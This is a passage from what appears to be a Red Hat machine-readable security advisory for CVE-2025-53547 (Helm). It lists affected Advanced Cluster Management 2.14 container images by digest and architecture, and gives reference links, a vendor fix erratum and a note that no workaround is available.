"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53547"
},
{
"category": "external",
"summary": "RHBZ#2378905",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2378905"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53547",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53547"
},
{
"category": "external",
"summary": "https://github.com/helm/helm/commit/4b8e61093d8f579f1165cdc6bd4b43fa5455f571",
"url": "https://github.com/helm/helm/commit/4b8e61093d8f579f1165cdc6bd4b43fa5455f571"
},
{
"category": "external",
"summary": "https://github.com/helm/helm/security/advisories/GHSA-557j-xg8c-q2mm",
"url": "https://github.com/helm/helm/security/advisories/GHSA-557j-xg8c-q2mm"
}
],
"release_date": "2025-07-08T21:39:59.075000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
